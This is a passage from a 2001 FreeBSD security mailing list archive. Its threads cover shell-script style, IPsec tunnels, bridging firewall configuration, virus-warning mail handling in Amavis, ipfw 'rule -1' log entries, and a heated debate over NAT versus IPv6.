script okay by you? ;) Umm, the idea was actually to suggest an improvement on your own script. If you don't like it, just ignore it. 1) it's conventional to use lowercase names for variables internal to the script, and reserve uppercase names for variables passed from the shell. 2) you should always take care to wrap variable references in double quotes 3) you shouldn't redirect fetch's stderr to /dev/null, use -q to hide the status messages 4) your for loop will break if one of the IDEs' name contains funny characters; my while loop won't 5) you don't need to cd to ${idedir}, you can ask fetch to put the files there for you - though that's mostly a matter of taste DES -- Dag-Erling Smorgrav - des@ofug.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Mar 13 16:54:28 2001 Delivered-To: freebsd-security@freebsd.org Received: from dell.dannyland.org (dell.dannyland.org [64.81.36.13]) by hub.freebsd.org (Postfix) with ESMTP id 36C6137B718 for ; Tue, 13 Mar 2001 16:54:26 -0800 (PST) (envelope-from dannyman@toldme.com) Received: by dell.dannyland.org (Postfix, from userid 1001) id D262B5BF7; Tue, 13 Mar 2001 16:54:34 -0800 (PST) Date: Tue, 13 Mar 2001 16:54:34 -0800 From: dannyman To: Dag-Erling Smorgrav Cc: freebsd-security@FreeBSD.ORG Subject: Re: Sophos "idefetch" script Message-ID: <20010313165434.B3500@dell.dannyland.org> References: <20010313151512.Q3500@dell.dannyland.org> <20010313161017.Z3500@dell.dannyland.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0.1i In-Reply-To: ; from des@ofug.org on Wed, Mar 14, 2001 at 01:40:15AM +0100 X-Loop: djhoward@uiuc.edu X-URL: http://www.dannyland.org/~dannyman/ Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, Mar 14, 2001 at 01:40:15AM +0100, Dag-Erling Smorgrav wrote: > dannyman writes: > > Is this addendum to the script okay by you? ;) > > Umm, the idea was actually to suggest an improvement on your own > script. If you don't like it, just ignore it. [...] Ehhh ... great points that I may use in my life. I just like to share enough rope to hang oneself. I try to keep the fetch arguments simple for portability to non-FreeBSD. For a simple for loop, things started getting silly the moment I slapped my company's license on there. And I used the uppercase so some random person checking out the script would see "oh ... I change THAT variable." (Like a #define or something in a Makefile.) I put your version at the bottom as the easy, lightweight, not 40 lines of commentary and license version, as the stuff above, as noted, has gotten silly, and just to make it absolutely clear, that everything we ever need in life, can just be finished with with the right six lines of shell script. (Or one well-formed wget command, but I digress.) I hope everyone is happily implementing their respective solutions though. :) Thanks, -danny -- http://dannyman.toldme.com/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Mar 13 18:36: 5 2001 Delivered-To: freebsd-security@freebsd.org Received: from cs4.cs.ait.ac.th (cs4.cs.ait.ac.th [192.41.170.16]) by hub.freebsd.org (Postfix) with ESMTP id 269E437B72A for ; Tue, 13 Mar 2001 18:35:55 -0800 (PST) (envelope-from Olivier.Nicole@ait.ac.th) Received: from bazooka.cs.ait.ac.th (on@bazooka.cs.ait.ac.th [192.41.170.2]) by cs4.cs.ait.ac.th (8.9.3/8.9.3) with ESMTP id JAA25986; Wed, 14 Mar 2001 09:35:38 +0700 (GMT+0700) From: Olivier Nicole Received: (from on@localhost) by bazooka.cs.ait.ac.th (8.8.5/8.8.5) id JAA25550; Wed, 14 Mar 2001 09:35:46 +0700 (ICT) Date: Wed, 14 Mar 2001 09:35:46 +0700 (ICT) Message-Id: <200103140235.JAA25550@bazooka.cs.ait.ac.th> To: lee@kechara.net Cc: security@FreeBSD.ORG In-reply-to: <200103131841.SAA10089@mailgate.kechara.net> (message from Lee Smallbone on Tue, 13 Mar 2001 17:35:00 -0000) Subject: Re: [OT?] - Central point router Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi Lee, Given than you may have to consider renumbering of the servers, and that you could add a switch behind the FreeBSD router box, it is pretty simple. A PII 500, with 128 MB ram and 2 GB hardisk (where to find that small disk) can do the trick. If your LAN is only 10M, then a P100 would be enough (I had been operating one for years, upgraded to PIII when we changed the LAN to 100M). You may consider running gated or zebra, to the routing is limited and static could do. It is mainly problem of setting up the routing (which does not pertain to this list) and opening few ports on the firewall. One alternative solution read recently is to use DUMMY interface on FreeBSD that allows to set-up a machine that has NO IP address (it is like a sort of HUB) and still a firewall can be configured on it (see mail archive less than 5 days ago). That way you avoid routing problems and I beleive the machine is even more secure as it is invisible from Internet. Of course you need a switch to serve your 3 servers. Olivier To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Mar 13 20:43:52 2001 Delivered-To: freebsd-security@freebsd.org Received: from shorty.ahpcns.com (joemoore-host.dsl.visi.com [209.98.246.61]) by hub.freebsd.org (Postfix) with ESMTP id 36FAC37B719 for ; Tue, 13 Mar 2001 20:43:50 -0800 (PST) (envelope-from jomor@ahpcns.com) Received: from ahpcns.com (localhost [127.0.0.1]) by shorty.ahpcns.com (Postfix) with ESMTP id 2958A3A715 for ; Tue, 13 Mar 2001 22:43:47 -0600 (CST) Message-ID: <3AAEF702.9AC2715B@ahpcns.com> Date: Tue, 13 Mar 2001 22:43:46 -0600 From: jomor Organization: ahpcns X-Mailer: Mozilla 4.72 [en] (X11; I; FreeBSD 3.5-STABLE i386) X-Accept-Language: en MIME-Version: 1.0 To: freebsd-security@freebsd.org Subject: IPSEC tunnel without gif? Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I've been setting up a VPN with tunnel mode IPSEC and things are going OK so far but in searching the list archives, I've found some stuff that seems to imply that gif tunnels are not needed for tunnel mode. Is this true? I've only gotten it to work by pre-configuring the gif tunnel, but now I'm not sure if I have true "tunnel mode IPSEC" or "transport mode IPSEC" applied to an "IP-ENCAP" tunnel such as that suggested by the X-bone project. seeking enlightenment ...jgm To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Mar 13 20:52:17 2001 Delivered-To: freebsd-security@freebsd.org Received: from w2xo.pgh.pa.us (18.gibs5.xdsl.nauticom.net [209.195.184.19]) by hub.freebsd.org (Postfix) with ESMTP id 3E62537B719 for ; Tue, 13 Mar 2001 20:52:15 -0800 (PST) (envelope-from durham@w2xo.pgh.pa.us) Received: from shazam (shazam [192.168.5.3]) by w2xo.pgh.pa.us (8.11.2/8.9.3) with ESMTP id f2E4pcq41853 for ; Wed, 14 Mar 2001 04:51:39 GMT (envelope-from durham@w2xo.pgh.pa.us) Date: Tue, 13 Mar 2001 23:54:01 -0500 (EST) From: Jim Durham X-Sender: durham@shazam.int To: freebsd-security@freebsd.org Subject: Sophos and Virus return mail Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Great discussion going on about Sophos and Amavis! This may be something I'm missing, but there are several virii that apparently send no "envelope from" address when they generate virus mail. One that comes to mind is the stupid "Snow White" thing. I went through the Amavis scan script and I see that if there is no "envelope from" address, it punts and sends the warning to "MAILER-DAEMON". This means you get a bazillion of these messages every day (We seem to have employees who appear in the address books of people with this virus!). Also, the person with the virus does not get the warning mail. I thought of rewriting the script to use the "From: " address to reply. I think that would usually work, but I'm not sure that address always appears either. Anyone done anything with this? Thanks, Jim Durham To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Mar 13 20:57: 6 2001 Delivered-To: freebsd-security@freebsd.org Received: from mail.xmission.com (mail.xmission.com [198.60.22.22]) by hub.freebsd.org (Postfix) with ESMTP id DCA1F37B71A for ; Tue, 13 Mar 2001 20:57:04 -0800 (PST) (envelope-from cookfire@xmission.com) Received: from [166.70.183.163] (helo=cook) by mail.xmission.com with smtp (Exim 3.12 #1) id 14d3LM-0003NU-00 for freebsd-security@freebsd.org; Tue, 13 Mar 2001 21:57:04 -0700 Reply-To: From: "Craig Chaney" To: Subject: Bridging only 2 interfaces??? Date: Tue, 13 Mar 2001 21:57:35 -0700 Message-ID: <001501c0ac43$49dcfe60$a3b746a6@cook> MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook CWS, Build 9.0.2416 (9.0.2910.0) X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4133.2400 Importance: Normal Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I have set up a bridging firewall that has 3 interfaces. One of the interfaces is the protected side of the machine, one is the internet side of the machine, and the third is an interface in to my local network for management purposes. Is it possible to set up the machine to bridge just the interfaces not connected to the local network? If so how? Thank you --Craig To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Mar 13 22:37:59 2001 Delivered-To: freebsd-security@freebsd.org Received: from mail.freebsd-corp-net-guide.com (mail.freebsd-corp-net-guide.com [206.29.169.15]) by hub.freebsd.org (Postfix) with ESMTP id 164B237B71A; Tue, 13 Mar 2001 22:37:48 -0800 (PST) (envelope-from tedm@toybox.placo.com) Received: from tedm.placo.com (nat-rtr.freebsd-corp-net-guide.com [206.29.168.154]) by mail.freebsd-corp-net-guide.com (8.11.1/8.11.1) with SMTP id f2E6ZDN22442; Tue, 13 Mar 2001 22:35:13 -0800 (PST) (envelope-from tedm@toybox.placo.com) From: "Ted Mittelstaedt" To: "Bob Van Valzah" Cc: "pW" , , Subject: RE: Racoon Problem & Cisco Tunnel Date: Tue, 13 Mar 2001 22:35:12 -0800 Message-ID: <003d01c0ac50$ec379280$1401a8c0@tedm.placo.com> MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook 8.5, Build 4.71.2173.0 Importance: Normal In-Reply-To: <3AAE24E6.9080802@Talarian.Com> X-MimeOLE: Produced By Microsoft MimeOLE V4.72.3155.0 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Thanks! It's not really a religious war, because there's valid reasons to move to IPv6 and I think it's obvious that ultimately the Internet is going to have to go there. But, what the engineers don't understand is that this is a political problem, not a technical problem. They just see it like the Post Office sees it when they need a new zip code. What they always forget is that there's ways to twist the arms of people that are address space hogs that will force those addresses to be upchucked - thus the "imminent shortage" magically disappears for another 6 months until the next person's arm needs to be twisted. And, there's an incredible number of arms out there that can be twisted. Take some of those large corporations, like SquishySoft, that have entire class A's assigned to them, but firewall the entire address space off from the public Internet, and only allow incoming connections to perhaps 100 of them. Would you like to be the CEO of Squishy when the papers start rolling the story of how this company's completely unjustified hanging-on of this block is preventing another 16 million people from being brought on to the Internet? I agree with you on ISP's needing to hand out public numbers. The ISP I work for hands them out with every account, either work or home, for no extra charge. As long as you know what your doing when you put together your network it's not a problem for the ISP. I've even been known to cut the occasional /29 subnet to people that had justification for it. I only draw the line at the people that want a dozen numbers in the DSL bridge itself and are too cheap to buy a router. But, going beyond a /29 for a small company - that's a different story, and we make people jump through hoops before doing it. Ted Mittelstaedt tedm@toybox.placo.com Author of: The FreeBSD Corporate Networker's Guide Book website: http://www.freebsd-corp-net-guide.com -----Original Message----- From: Bob Van Valzah [mailto:Bob@Talarian.Com] Sent: Tuesday, March 13, 2001 5:47 AM To: Ted Mittelstaedt Cc: pW; FreeBSD-Security@FreeBSD.ORG; FreeBSD-Questions@FreeBSD.ORG Subject: Re: Racoon Problem & Cisco Tunnel Ted, Loved the book--can't wait for the movie! This is a religious war that's been fought many times before. Since my last answer was too flip, I'll clarify my point of view. IPv4, IPv6, and NAT are all just tools that I have to apply with "business sense." NAT's not inherently evil, nor is IPv6. Their sensibility will change over time and depend upon the application. If I were shopping for DSL for "my mom," I wouldn't care if she got a public address or not. Reliability and good support (as a "little guy" can more often provide) would be more important. But when I'm shopping for DSL for a work-from-home, multicast protocol stack developer, a public address is a requirement. In fact, it's something I'll pay extra to get. For my business, IPSec is important and hence having at least one public address is important. My protocol developers have a few LANs at home and we happily use NAT there. I wouldn't pay extra to get enough address space to put public addresses on all their home lab machines. An ISP who won't give me at least one public address is just limiting where I can apply their service. An ISP who gives me one or more public addresses let's me pick the point at which I want to apply NAT. So in spite of my flip remarks, I hope you can see that I do use NAT--I just put it off to the last minute where it doesn't make business sense to avoid it. Bob Ted Mittelstaedt wrote: -----Original Message-----From: owner-freebsd-questions@FreeBSD.ORG[mailto:owner-freebsd-questions@FreeBSD.O RG]On Behalf Of Bob Van ValzahSent: Monday, March 12, 2001 8:07 AMTo: pWCc: FreeBSD-Security@FreeBSD.ORG; FreeBSD-Questions@FreeBSD.ORGSubject: Re: Racoon Problem & Cisco TunnelYes. The five DSL setups with which I'm familiar all grant at least onepublic address per house. I believe all are static, but one might bedynamic. Interference with protocols like IPSec is one of the reasonswhy I'd make a public address a requirement when choising a DSL! provider. When it comes to NAT, I'm with Vint Cerf--avoid it if at allpossible. Let's hasten the deployment of IPv6. I'd agree with you if everyone that would have to do a renumber of alarge network from IPv4 to IPv6 had Vint Cerf's money. When your retiredlike him with money coming out your arse-hole you can afford to makeirresponsible statements like that.Unfortunately, what people like him don't understand is that the burden ofrenumbering the fabric of the Internet from IPv4 to IPv6 will fall largelyon people like me - who have thousands of customers and tens of thousands ofpublic IP numbers spread out among all of them - and who don't have themoney to support something this audacious. I can almost guarentee thatwhatever ISP that I am working for when this finally happens is going to goout of business, all it's going to do is put thousands of smaller tomedium-sized ISP's into bankruptcy and let people like AOL who have moneycoming out their arse-holes virtually monopolize Internet access in theworld.! Until I see the large organizations with Class A's tied up, give up thosenumbers back to the pool, I'll fight any attempt to move from IPv4 to IPv6,and most other ISP's that are out there are going to fight it as well. Inthe meantime I'm pushing all my customers into using NAT. NAT is here tostay and people that run around calling it an aberration are just proving tothe rest of us that they have absolutely no business sense.NAT has proven itself reliable and vital and idiot engineers that design TCPprotocols that assume everyone has a public IP number are just architectingtheir own failures, and their protocol's subsequent minimizing by themarket. I have some sympathy for protocols like IPSec that came to beduring the same time - but organizational-to-organizational IPSec tunnelsdon't have to pass through the NAT - they can terminate on it. But, anyonedoing a new protocol today is a fool if it can't work though a NAT.! Ted Mittelstaedt tedm@toybox.placo.comAuthor of: The FreeBSD Corporate Networker's GuideBook website: http://www.freebsd-corp-net-guide.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Mar 13 23:20:26 2001 Delivered-To: freebsd-security@freebsd.org Received: from mailhost01.reflexnet.net (mailhost01.reflexnet.net [64.6.192.82]) by hub.freebsd.org (Postfix) with ESMTP id 07D6137B71B for ; Tue, 13 Mar 2001 23:20:17 -0800 (PST) (envelope-from cjc@rfx-216-196-73-168.users.reflexcom.com) Received: from rfx-216-196-73-168.users.reflexcom.com ([216.196.73.168]) by mailhost01.reflexnet.net with Microsoft SMTPSVC(5.5.1877.197.19); Tue, 13 Mar 2001 23:18:15 -0800 Received: (from cjc@localhost) by rfx-216-196-73-168.users.reflexcom.com (8.11.1/8.11.1) id f2E7KFh11046; Tue, 13 Mar 2001 23:20:15 -0800 (PST) (envelope-from cjc) Date: Tue, 13 Mar 2001 23:20:14 -0800 From: "Crist J. Clark" To: Alan Batie Cc: security@FreeBSD.ORG Subject: Re: ipfw rule -1? Message-ID: <20010313232014.B496@cjc-desktop.users.reflexcom.com> Reply-To: cjclark@alum.mit.edu References: <20010313084020.A5859@agora.rdrop.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20010313084020.A5859@agora.rdrop.com>; from alan@batie.org on Tue, Mar 13, 2001 at 08:40:20AM -0800 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, Mar 13, 2001 at 08:40:20AM -0800, Alan Batie wrote: > I'm seeing a few of these in my ipfw log and was wondering what rule -1 is? > I couldn't find anything about it in the man page... > > > ipfw: -1 Refuse TCP 62.29.124.91:20041 199.2.210.241:17227 in via etha16 > > ipfw: -1 Refuse TCP 62.29.124.91:20041 199.2.210.241:17227 in via etha16 > > ipfw: -1 Refuse TCP 62.29.124.91:20041 199.2.210.241:17227 in via etha16 > > ipfw: -1 Refuse TCP 62.29.124.91:97 199.2.210.241:29540 in via etha16 > > ipfw: -1 Refuse TCP 62.29.124.91:20041 199.2.210.241:17227 in via etha16 The manpage does not go as far as to indicate that this is rule -1, but it does say this happens, FINE POINTS o There is one kind of packet that the firewall will always discard, that is a TCP packet's fragment with a fragment offset of one. This is a valid packet, but it only has one use, to try to circumvent firewalls. Rule -1 is given for any packet dropped, but not dropped due to a user rule or the default rule. A quick look at the souce indicates the above pseudo-rule and some other fragment issues (bogusfrag) are the only such situations. OK, I've answered this one enough times now. Should I send in a PR with patch to the manpage or is this for the FAQ? -- Crist J. Clark cjclark@alum.mit.edu To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Mar 13 23:29:16 2001 Delivered-To: freebsd-security@freebsd.org Received: from awww.jeah.net (awww.jeah.net [216.111.239.130]) by hub.freebsd.org (Postfix) with ESMTP id A330437B719 for ; Tue, 13 Mar 2001 23:29:12 -0800 (PST) (envelope-from chris@jeah.net) Received: from localhost (chris@localhost) by awww.jeah.net (8.11.1/8.11.0) with ESMTP id f2E7T0c08415; Wed, 14 Mar 2001 01:29:00 -0600 (CST) (envelope-from chris@jeah.net) Date: Wed, 14 Mar 2001 01:28:59 -0600 (CST) From: Chris Byrnes To: Cc: Alan Batie , Subject: Re: ipfw rule -1? In-Reply-To: <20010313232014.B496@cjc-desktop.users.reflexcom.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I think it'd be nice to see it in the manpage right underneath the "Fine Point" you pasted. + Chris Byrnes, chris@JEAH.net + JEAH Communications + 1-866-AWW-JEAH (Toll-Free) On Tue, 13 Mar 2001, Crist J. Clark wrote: > On Tue, Mar 13, 2001 at 08:40:20AM -0800, Alan Batie wrote: > > I'm seeing a few of these in my ipfw log and was wondering what rule -1 is? > > I couldn't find anything about it in the man page... > > > > > ipfw: -1 Refuse TCP 62.29.124.91:20041 199.2.210.241:17227 in via etha16 > > > ipfw: -1 Refuse TCP 62.29.124.91:20041 199.2.210.241:17227 in via etha16 > > > ipfw: -1 Refuse TCP 62.29.124.91:20041 199.2.210.241:17227 in via etha16 > > > ipfw: -1 Refuse TCP 62.29.124.91:97 199.2.210.241:29540 in via etha16 > > > ipfw: -1 Refuse TCP 62.29.124.91:20041 199.2.210.241:17227 in via etha16 > > The manpage does not go as far as to indicate that this is rule -1, > but it does say this happens, > > FINE POINTS > o There is one kind of packet that the firewall will always discard, > that is a TCP packet's fragment with a fragment offset of one. This > is a valid packet, but it only has one use, to try to circumvent > firewalls. > > Rule -1 is given for any packet dropped, but not dropped due to a user > rule or the default rule. A quick look at the souce indicates the > above pseudo-rule and some other fragment issues (bogusfrag) are the > only such situations. > > OK, I've answered this one enough times now. Should I send in a PR > with patch to the manpage or is this for the FAQ? > -- > Crist J. Clark cjclark@alum.mit.edu > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Mar 13 23:32:27 2001 Delivered-To: freebsd-security@freebsd.org Received: from castle.dreaming.org (castle.dreaming.org [216.221.214.170]) by hub.freebsd.org (Postfix) with ESMTP id DDEB137B718; Tue, 13 Mar 2001 23:32:11 -0800 (PST) (envelope-from mit@mitayai.net) Received: (from root@localhost) by castle.dreaming.org (8.11.2/8.11.2) id f2E7WBx78903; Wed, 14 Mar 2001 02:32:11 -0500 (EST) (envelope-from mit@mitayai.net) Received: from cr592943a (cr592943-a.bloor1.on.wave.home.com [24.156.38.199]) by castle.dreaming.org (8.11.2/8.11.2av) with SMTP id f2E7W9t78895; Wed, 14 Mar 2001 02:32:09 -0500 (EST) (envelope-from mit@mitayai.net) From: "Will Mitayai Keeso Rowe" To: Cc: Subject: RE: ICMP attacks Date: Wed, 14 Mar 2001 02:29:17 -0500 Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2911.0) In-Reply-To: <980521178.3a7190da7ba07@mail.marketnews.com> X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4133.2400 Importance: Normal X-Virus-Scanned: by AMaViS perl-10 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org i'd love to use snort, but i keep getting this: [castle:root]/usr/ports/security/snort# make -DWITH_MYSQL=yes clean install ===> Cleaning for snort-1.7 ===> Extracting for snort-1.7 >> Checksum OK for snort-1.7.tar.gz. gzip: stdout: Broken pipe ===> Patching for snort-1.7 ===> Configuring for snort-1.7 :-----Original Message----- :From: owner-freebsd-security@FreeBSD.ORG :[mailto:owner-freebsd-security@FreeBSD.ORG]On Behalf Of :mharding@marketnews.com :Sent: January 26, 2001 10:00 AM :To: Will Mitayai Keeso Rowe :Cc: freebsd-security@FreeBSD.ORG :Subject: Re: ICMP attacks : : :Try using a Intrusion detection system. Snort works well for me. :If this is :just a port scan it will show a lot of different attack warnings as the :different ports are hit, but it will show what IP is doing it. : :Mason : :Quoting Will Mitayai Keeso Rowe : : :> > icmp-response bandwidth limit 205/200 pps :> > icmp-response bandwidth limit 264/200 pps :> > icmp-response bandwidth limit 269/200 pps :> > icmp-response bandwidth limit 273/200 pps :> > icmp-response bandwidth limit 273/200 pps :> > icmp-response bandwidth limit 271/200 pps :> > icmp-response bandwidth limit 261/200 pps :> > icmp-response bandwidth limit 268/200 pps :> > icmp-response bandwidth limit 205/200 pps :> > icmp-response bandwidth limit 223/200 pps :> :> Is there any way to trace the people that are causing this? It's :> becoming a :> daily occurance and it's beginning to irritate me. :> :> -Mit :> :> :> :> :> :> To Unsubscribe: send mail to majordomo@FreeBSD.org :> with "unsubscribe freebsd-security" in the body of the message :> : : :To Unsubscribe: send mail to majordomo@FreeBSD.org :with "unsubscribe freebsd-security" in the body of the message : : To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Mar 13 23:42: 0 2001 Delivered-To: freebsd-security@freebsd.org Received: from luke.macfat.dk (port3.ds1-taa.adsl.cybercity.dk [212.242.189.68]) by hub.freebsd.org (Postfix) with ESMTP id 0A59137B719 for ; Tue, 13 Mar 2001 23:41:53 -0800 (PST) (envelope-from macfat@macfat.dk) Received: by luke.macfat.dk (Postfix, from userid 1001) id CDFED55416; Wed, 14 Mar 2001 08:41:51 +0100 (CET) Date: Wed, 14 Mar 2001 08:41:51 +0100 From: Rene Pedersen To: Craig Chaney Cc: freebsd-security@freebsd.org Subject: Re: Bridging only 2 interfaces??? Message-ID: <20010314084151.A93208@luke.macfat.dk> References: <001501c0ac43$49dcfe60$a3b746a6@cook> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <001501c0ac43$49dcfe60$a3b746a6@cook>; from cookfire@xmission.com on Tue, Mar 13, 2001 at 09:57:35PM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, Mar 13, 2001 at 09:57:35PM -0700, Craig Chaney wrote: > I have set up a bridging firewall that has 3 interfaces. One of the > interfaces is the protected side of the machine, one is the internet side of > the machine, and the third is an interface in to my local network for > management purposes. Is it possible to set up the machine to bridge just the > interfaces not connected to the local network? If so how? You should have a look at sysctl net.link.ether.bridge_cfg where you can define which interfaces that are bridged eg: sysctl -w net.link.ether.bridge_cfg: fxp0:1,fxp1:1,fxp2:0, which will bridge on fxp0 and fxp1 but not fxp2 // Rene -- Micro$oft is not the answer, Micro$oft is the question, the answer is no. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Mar 14 0:26: 0 2001 Delivered-To: freebsd-security@freebsd.org Received: from hotmail.com (f155.law7.hotmail.com [216.33.237.155]) by hub.freebsd.org (Postfix) with ESMTP id 02B8437B718 for ; Wed, 14 Mar 2001 00:25:57 -0800 (PST) (envelope-from ntvsunix@hotmail.com) Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC; Wed, 14 Mar 2001 00:25:56 -0800 Received: from 209.53.55.186 by lw7fd.law7.hotmail.msn.com with HTTP; Wed, 14 Mar 2001 08:25:56 GMT X-Originating-IP: [209.53.55.186] From: "Some Person" To: cookfire@xmission.com, freebsd-security@freebsd.org Subject: Re: Bridging only 2 interfaces??? Date: Wed, 14 Mar 2001 08:25:56 Mime-Version: 1.0 Content-Type: text/plain; format=flowed Message-ID: X-OriginalArrivalTime: 14 Mar 2001 08:25:56.0750 (UTC) FILETIME=[646432E0:01C0AC60] Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I've never done that on FreeBSD (yet) and I do exactly that, with three NICs on OpenBSD 2.8. I'm sure it's just as easily possible with FreeBSD using IPFW... IPF on OpenBSD would change the ruleset completely on the 'bridged' interface/rules file. It's a little tricky at first, but then very easy once you get the concept. And not to forget that the (non-bridged) interface (if you decided to use rules, is to use the normal rule processing and not the contrary for the bridged interfaces). Not trying to push you away from FreeBSD, just trying to help where I can... Best Regards! FreeBSD/OpenBSD - Advocate! > >I have set up a bridging firewall that has 3 interfaces. One of the >interfaces is the protected side of the machine, one is the internet side >of >the machine, and the third is an interface in to my local network for >management purposes. Is it possible to set up the machine to bridge just >the >interfaces not connected to the local network? If so how? > >Thank you > >--Craig > > >To Unsubscribe: send mail to majordomo@FreeBSD.org >with "unsubscribe freebsd-security" in the body of the message _________________________________________________________________________ Get Your Private, Free E-mail from MSN Hotmail at http://www.hotmail.com. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Mar 14 0:31:45 2001 Delivered-To: freebsd-security@freebsd.org Received: from hotmail.com (f113.law7.hotmail.com [216.33.237.113]) by hub.freebsd.org (Postfix) with ESMTP id 2299237B71B for ; Wed, 14 Mar 2001 00:31:41 -0800 (PST) (envelope-from ntvsunix@hotmail.com) Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC; Wed, 14 Mar 2001 00:31:41 -0800 Received: from 209.53.55.186 by lw7fd.law7.hotmail.msn.com with HTTP; Wed, 14 Mar 2001 08:31:40 GMT X-Originating-IP: [209.53.55.186] From: "Some Person" To: freebsd-security@freebsd.org Subject: Re: Bridging only 2 interfaces??? Date: Wed, 14 Mar 2001 08:31:40 Mime-Version: 1.0 Content-Type: text/plain; format=flowed Message-ID: X-OriginalArrivalTime: 14 Mar 2001 08:31:41.0013 (UTC) FILETIME=[31969050:01C0AC61] Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Speaking of that, is it still not possible to filter bridged frames on FreeBSD with IPF? Personally IPF is my prefered choice over IPFW, although of course IPFW does have DUMMYNET.. :) Dunno if that's been changed yet, or if there's any plans for it? In the meanwhile, I've opted for OpenBSD and to be honest, I love it and haven't seen any performance penalty at all... I use FreeBSD for all other things too, but think would be kewl to have this in FreeBSD as well... Thanks. > >On Tue, Mar 13, 2001 at 09:57:35PM -0700, Craig Chaney wrote: > > I have set up a bridging firewall that has 3 interfaces. One of the > > interfaces is the protected side of the machine, one is the internet >side of > > the machine, and the third is an interface in to my local network for > > management purposes. Is it possible to set up the machine to bridge just >the > > interfaces not connected to the local network? If so how? > >You should have a look at sysctl net.link.ether.bridge_cfg where you can >define which interfaces that are bridged > >eg: sysctl -w net.link.ether.bridge_cfg: fxp0:1,fxp1:1,fxp2:0, >which will bridge on fxp0 and fxp1 but not fxp2 > >// Rene > >-- >Micro$oft is not the answer, Micro$oft is the question, the answer is no. > >To Unsubscribe: send mail to majordomo@FreeBSD.org >with "unsubscribe freebsd-security" in the body of the message _________________________________________________________________________ Get Your Private, Free E-mail from MSN Hotmail at http://www.hotmail.com. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Mar 14 0:47:37 2001 Delivered-To: freebsd-security@freebsd.org Received: from agora.rdrop.com (agora.rdrop.com [199.2.210.241]) by hub.freebsd.org (Postfix) with ESMTP id 4791837B718 for ; Wed, 14 Mar 2001 00:47:35 -0800 (PST) (envelope-from alan@agora.rdrop.com) Received: (from alan@localhost) by agora.rdrop.com (8.11.1/8.11.1) id f2E8mCg01662; Wed, 14 Mar 2001 00:48:12 -0800 (PST) Date: Wed, 14 Mar 2001 00:48:12 -0800 From: Alan Batie To: Chris Byrnes Cc: cjclark@alum.mit.edu, security@FreeBSD.ORG Subject: Re: ipfw rule -1? Message-ID: <20010314004812.A1528@agora.rdrop.com> Mail-Followup-To: Chris Byrnes , cjclark@alum.mit.edu, security@FreeBSD.ORG References: <20010313232014.B496@cjc-desktop.users.reflexcom.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from chris@jeah.net on Wed, Mar 